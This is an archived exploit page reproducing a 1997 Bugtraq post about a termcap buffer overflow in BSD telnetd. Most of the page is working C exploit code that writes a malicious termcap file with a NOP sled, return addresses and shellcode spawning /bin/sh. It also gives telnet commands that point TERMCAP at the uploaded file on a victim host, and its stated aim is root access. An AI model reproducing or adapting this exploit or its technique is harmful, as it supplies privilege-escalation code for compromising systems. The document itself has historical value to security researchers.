BSD Termcap overflow

Summary

Description:	This program creates a malicous termcap file which can cede root access.
Author:	Bug originally discovered by Theo de Raadt <deraadt@CVS.OPENBSD.ORG> exploit written by Written by Joseph_K the 22-Oct-1997
Compromise:	Theoretically this may allow you to become root remotely You can definately become root locally.
Vulnerable Systems:	BSDI, probably FreeBSD/NetBSD/OpenBSD prior to October 1997
Date:	1 December 1997

Details


Date: Mon, 1 Dec 1997 06:24:55 -0800
From: John Brahy <jbrahy@HADES.LB.DEVRY.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: in.telnetd bug (linux)

There is a BSD exploit that works on the termcap file. it has some entries
like this.

 telnet> env def TERM access
 telnet> env def TERMCAP /path/and/name/of/uploaded/file
 telnet> open victim.host.com

and the source code is here:
--------SNIP-----

#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define filename "./termcap"
#define entry   "access|Gimme r00t:\\\n :"
#define bufsize 1300
#define default_offset 870    /* Should work...*/

char shellcode[] =
   "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a\x3e\x39\x29\x28\x39\x3c\xe8\xc6\xff\xff\xff/bin/sh";

long get_sp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(int argc, char *argv[]) {
   int i, fd, offs;
   long *bof_ptr;
   char *ptr, *buffer, *tempbuf;

   offs = default_offset;

   if(argc == 2) {
      printf("using offset: %d\n",atoi(argv[1]));
      offs = atoi(argv[1]);
   }

   if(!(buffer = malloc(bufsize))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }


  if(!(tempbuf = malloc(bufsize+strlen(entry) + 50))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }

   bof_ptr = (long *)buffer;
   for (i = 0; i < bufsize - 4; i += 4)
      *(bof_ptr++) = get_sp() - offs;

   ptr = (char *)buffer;
   for (i = 0; i < ((bufsize-strlen(shellcode)))/2 - 1; i++)
      *(ptr++) = 0x90;

   for (i = 0; i < strlen(shellcode); i++)
      *(ptr++) = shellcode[i];

   printf("Creating termcap file\n");

   snprintf(tempbuf, (bufsize+strlen(entry)+50), "%s%s:\n", entry,
buffer);
   fd = open(filename, O_WRONLY|O_CREAT, 0666);
   write (fd, tempbuf, strlen(tempbuf));
   close(fd);
}

--------SNIP------------

PEOPLE who actually wrote this:

Bug originally discovered by Theo de Raadt <deraadt@CVS.OPENBSD.ORG>
BSDI BSD/OS 2.1 telnet-exploit
Written by Joseph_K the 22-Oct-1997
Original shellcode by mudge@l0pht.com but modified a tiny bit...
 _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _
:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:
                _  _ _  _ _       ___  ____ _ _ _
                |\ | |\ | |    __ |__] |    | | |
                | \| | \| |___    |    |___ |_|_|

_________________________________________________________________
                                /
John Brahy, CNA                /
DeVry Institute of Techonolgy /             Long Beach, California
Computer Information Systems /  mailto://jbrahy@hades.lb.devry.edu
 _   _   _   _   _   _   _  /_   _   _   _   _   _   _   _   _   _
:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: